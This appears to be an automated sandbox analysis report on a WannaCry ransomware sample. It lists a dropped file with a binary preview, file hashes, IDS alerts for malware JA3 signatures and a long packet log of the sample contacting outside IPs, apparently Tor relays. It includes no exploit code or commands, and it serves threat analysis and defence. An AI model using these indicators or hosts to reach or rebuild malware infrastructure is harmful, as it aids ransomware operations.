                                                                              Preview:WANACRY!......TN.u.~...KP%o..o.....Z.J!l........O.....H.>.1..f.7...$......tg.......].h&....d....%.3..r...vI...Z.T....M..^.}.#...au..m..r-...k.&['l9..F....>N.7.Cn.}*..3'8`.J.&.f...-/.H..E}Z..?{...X.U..8.3....t......)......3..6..Ym:..c..h.|..z<...a.Y..............2.....m....-...R.wt.=..No~Y. Z5....L}..$...a./..n./c.[.Fy4MH]v../.w.!..EV..z..m.l..q....gxVt....)q..0T..CS;..bJ&.3L..?.*...8H.za..+...}.<....:.4..N......."...@...O.a.)._2....3.8.>.D.S...... sD.gv..P{...H.n......A^...\....*.M.gy].........*.M...8\......^...M.!...r...w....&L$}....2..iK.Pn....#.$..r>.-qf..(.@.Q..V....z.6V$.M.}c/N...S........2I.A^./(}..T.A.}N.P"....F(a..w....C.u. ^._......>.....Y.K...\...&=6.Z........P$..f:...../...).....4...{..#.....@b....o~.th..<d.....m$'....&U.*..a=.t.y3..5......b...M.........AeH7.........f.....|....U..b.:..s...U......tL......yC..M.R..~.VR...9.......!..|..>M..)y.p..^`*$h,G...BR.#q...m...5...BZ...!.F.....u .].~..>z...I..D..e....L..Uvy.Z'.(
                                                                              Process:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                              File Type:ASCII text, with CRLF, CR line terminators
                                                                              Category:dropped
                                                                              Size (bytes):48
                                                                              Entropy (8bit):4.305255793112395
                                                                              Encrypted:false
                                                                              SSDEEP:3:8yzGc7C1RREal:nzGtRV
                                                                              MD5:6ED2062D4FB53D847335AE403B23BE62
                                                                              SHA1:C3030ED2C3090594869691199F46BE7A9A12E035
                                                                              SHA-256:43B5390113DCBFA597C4AAA154347D72F660DB5F2A0398EB3C1D35793E8220B9
                                                                              SHA-512:C9C302215394FEC0B38129280A8303E0AF46BA71B75672665D89828C6F68A54E18430F953CE36B74F50DC0F658CA26AC3572EA60F9E6714AFFC9FB623E3C54FC
                                                                              Malicious:false
                                                                              Preview:ERROR:...Description = Initialization failure...
                                                                              File type:Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
                                                                              Entropy (8bit):7.999950127956054
                                                                              TrID:
                                                                              • ZIP compressed archive (8000/1) 99.91%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.09%
                                                                              File name:WannaCry.bin.zip
                                                                              File size:3'483'686 bytes
                                                                              MD5:ea519b09029a4f50fa287b56ff0a4ced
                                                                              SHA1:de8247d49aa8b8f036afe47838044bdf6abc8f3d
                                                                              SHA256:03c844091ab3980e0ae13be2e456c3e00cfa3971139b53b95850db37757a9e84
                                                                              SHA512:ac4e612a40b45196ab00fa93351ed499c8e1314a9960c253b5f9af9b512787509e81337955ff0ec46085286d7c3ce9d4fb28e09af0b0cb8c4966cc3c3257bbdf
                                                                              SSDEEP:98304:1Bk9Y/pSX7m4Pc8o+F9qcdYpFcFtJATPCRthL5:/WIpC7mf8o+7FtwPCRL5
                                                                              TLSH:7AF533C56951E7AC189378C2820282A934782584F9BD161FCCDFEAD1FEF90E4DF6D11A
                                                                              File Content Preview:PK..3...c..h.X................WannaCry.bin......AE....N...FB.....l\".).*...I...G..G.....{.........3.m..].^C.7."c.c.0.Fp..|i...z.....*...j....>XY........O...m.U......W...#u.pm..P"'.I0...>A..{...xy.......Z.....dp.......&...'&..G...R,..6..r........U......~..
                                                                              Icon Hash:1c1c1e4e4ececedc
                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                              2024-10-04T08:43:59.684203+02002028377ET JA3 Hash - Possible Malware - Malspam3192.168.2.174971851.254.101.2429001TCP
                                                                              2024-10-04T08:44:21.090033+02002028377ET JA3 Hash - Possible Malware - Malspam3192.168.2.1749719194.109.206.212443TCP
                                                                              2024-10-04T08:44:21.892170+02002028377ET JA3 Hash - Possible Malware - Malspam3192.168.2.174972037.187.7.74443TCP
                                                                              2024-10-04T08:44:25.202134+02002028377ET JA3 Hash - Possible Malware - Malspam3192.168.2.1749725171.25.193.980TCP
                                                                              2024-10-04T08:44:31.988044+02002028377ET JA3 Hash - Possible Malware - Malspam3192.168.2.1749726185.32.222.2379444TCP
                                                                              2024-10-04T08:44:42.696351+02002028377ET JA3 Hash - Possible Malware - Malspam3192.168.2.174972451.254.246.2039001TCP
                                                                              2024-10-04T08:44:42.934849+02002028377ET JA3 Hash - Possible Malware - Malspam3192.168.2.1749721163.172.131.88443TCP
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Oct 4, 2024 08:43:38.324218035 CEST497189001192.168.2.1751.254.101.242
                                                                              Oct 4, 2024 08:43:38.324424028 CEST49719443192.168.2.17194.109.206.212
                                                                              Oct 4, 2024 08:43:38.324464083 CEST44349719194.109.206.212192.168.2.17
                                                                              Oct 4, 2024 08:43:38.324582100 CEST49719443192.168.2.17194.109.206.212
                                                                              Oct 4, 2024 08:43:38.329250097 CEST90014971851.254.101.242192.168.2.17
                                                                              Oct 4, 2024 08:43:38.329549074 CEST497189001192.168.2.1751.254.101.242
                                                                              Oct 4, 2024 08:43:38.333219051 CEST497189001192.168.2.1751.254.101.242
                                                                              Oct 4, 2024 08:43:38.333513021 CEST49719443192.168.2.17194.109.206.212
                                                                              Oct 4, 2024 08:43:38.333534956 CEST44349719194.109.206.212192.168.2.17
                                                                              Oct 4, 2024 08:43:38.338078976 CEST90014971851.254.101.242192.168.2.17
                                                                              Oct 4, 2024 08:43:39.134649992 CEST49720443192.168.2.1737.187.7.74
                                                                              Oct 4, 2024 08:43:39.134721994 CEST4434972037.187.7.74192.168.2.17
                                                                              Oct 4, 2024 08:43:39.135226965 CEST49720443192.168.2.1737.187.7.74
                                                                              Oct 4, 2024 08:43:39.149302006 CEST49720443192.168.2.1737.187.7.74
                                                                              Oct 4, 2024 08:43:39.149338961 CEST4434972037.187.7.74192.168.2.17
                                                                              Oct 4, 2024 08:43:59.684119940 CEST90014971851.254.101.242192.168.2.17
                                                                              Oct 4, 2024 08:43:59.684202909 CEST497189001192.168.2.1751.254.101.242
                                                                              Oct 4, 2024 08:43:59.684350967 CEST497189001192.168.2.1751.254.101.242
                                                                              Oct 4, 2024 08:43:59.689239025 CEST90014971851.254.101.242192.168.2.17
                                                                              Oct 4, 2024 08:44:00.198476076 CEST49721443192.168.2.17163.172.131.88
                                                                              Oct 4, 2024 08:44:00.198535919 CEST44349721163.172.131.88192.168.2.17
                                                                              Oct 4, 2024 08:44:00.198601007 CEST49721443192.168.2.17163.172.131.88
                                                                              Oct 4, 2024 08:44:00.198929071 CEST49721443192.168.2.17163.172.131.88
                                                                              Oct 4, 2024 08:44:00.198945999 CEST44349721163.172.131.88192.168.2.17
                                                                              Oct 4, 2024 08:44:21.089945078 CEST44349719194.109.206.212192.168.2.17
                                                                              Oct 4, 2024 08:44:21.090033054 CEST49719443192.168.2.17194.109.206.212
                                                                              Oct 4, 2024 08:44:21.090291977 CEST49719443192.168.2.17194.109.206.212
                                                                              Oct 4, 2024 08:44:21.090316057 CEST44349719194.109.206.212192.168.2.17
                                                                              Oct 4, 2024 08:44:21.201307058 CEST497249001192.168.2.1751.254.246.203
                                                                              Oct 4, 2024 08:44:21.206290960 CEST90014972451.254.246.203192.168.2.17
                                                                              Oct 4, 2024 08:44:21.206372023 CEST497249001192.168.2.1751.254.246.203
                                                                              Oct 4, 2024 08:44:21.206609964 CEST497249001192.168.2.1751.254.246.203
                                                                              Oct 4, 2024 08:44:21.211436987 CEST90014972451.254.246.203192.168.2.17
                                                                              Oct 4, 2024 08:44:21.892045975 CEST4434972037.187.7.74192.168.2.17
                                                                              Oct 4, 2024 08:44:21.892169952 CEST49720443192.168.2.1737.187.7.74
                                                                              Oct 4, 2024 08:44:21.892275095 CEST49720443192.168.2.1737.187.7.74
                                                                              Oct 4, 2024 08:44:21.892297983 CEST4434972037.187.7.74192.168.2.17
                                                                              Oct 4, 2024 08:44:24.452836037 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:24.457747936 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:24.457818985 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:24.458076954 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:24.462903023 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:25.146260977 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:25.202133894 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:25.249840021 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:25.254797935 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:25.721179008 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:25.721498013 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:25.726392984 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.302583933 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.302958012 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.303034067 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:26.375966072 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:26.380904913 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.600922108 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.616498947 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:26.621417046 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.821284056 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.826087952 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.826105118 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.826214075 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.826229095 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.826246977 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:26.826309919 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:26.826337099 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.826437950 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.826447964 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.826488018 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:26.826488972 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:26.826730967 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.826812983 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.826822996 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.826894045 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:26.826951981 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.827244043 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:26.917054892 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.917160988 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.917211056 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:26.931732893 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.931830883 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.931843042 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.931899071 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:26.932086945 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.932099104 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.932209015 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:26.932224035 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.932238102 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.932307005 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:26.932357073 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.932437897 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:26.932516098 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.932527065 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.932601929 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.932611942 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.932728052 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:26.932728052 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:26.932913065 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.932926893 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.932990074 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.933015108 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:26.933285952 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:26.935975075 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.936039925 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.936078072 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.936132908 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:26.936173916 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:26.936196089 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.936285019 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:26.936496973 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.936558962 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:26.936629057 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.936640024 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.936716080 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.936731100 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:26.936783075 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:26.936846018 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.936892986 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.937004089 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:26.937024117 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.937036991 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.937108040 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:26.937221050 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.937232971 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.937319040 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:26.937319040 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:26.937733889 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:26.937797070 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:26.938143969 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.022918940 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.039403915 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.039434910 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.039447069 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.039561987 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.039561987 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.039581060 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.039597034 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.039704084 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.039794922 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.039844990 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.039854050 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.039990902 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.040003061 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.040013075 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.040018082 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.040055037 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.040196896 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.040368080 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.040453911 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.040465117 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.040479898 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.040483952 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.040488958 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.040509939 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.040646076 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.040961981 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.040972948 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.040983915 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.041228056 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.041239977 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.041249990 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.041280985 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.041285038 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.041285038 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.041285038 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.041292906 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.041305065 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.041316986 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.041367054 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.041367054 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.042259932 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.042349100 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.042359114 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.042414904 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.042414904 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.042504072 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.042516947 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.042530060 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.042563915 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.042607069 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.042752028 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.042839050 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.042886972 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.042901039 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.042947054 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.043049097 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.043122053 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.043129921 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.043142080 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.043193102 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.043329000 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.043340921 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.043410063 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.043523073 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.043591976 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.043648958 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.043747902 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.043759108 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.043770075 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.044030905 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.048456907 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.048477888 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.048598051 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.048738956 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.048751116 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.048773050 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.048854113 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.053299904 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.053313017 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.053375006 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.053450108 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.053462029 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.053472042 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.053576946 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.148705006 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.148732901 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.148746014 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.148758888 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.148812056 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.148904085 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.153469086 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.153489113 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.153501034 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.153585911 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.153647900 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.153665066 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.153743029 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.158245087 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.158278942 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.158346891 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.158360004 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.158370018 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.158380985 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.158404112 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.158404112 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.158446074 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.163000107 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.163013935 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.163024902 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.163125992 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.163129091 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.163141966 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.163153887 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.163204908 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.163204908 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.165815115 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.167785883 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.167802095 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.167812109 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.167946100 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.167946100 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.167954922 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.167969942 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.167982101 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.168071985 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.172519922 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.172533035 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.172544003 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.172554970 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.172610998 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.172652006 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.172666073 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.172677040 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.172687054 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.172702074 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.172702074 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.172756910 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.177331924 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.177346945 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.177356005 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.177366018 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.177472115 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.177470922 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.177470922 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.177484989 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.177495956 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.177509069 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.177560091 CEST4972580192.168.2.17171.25.193.9
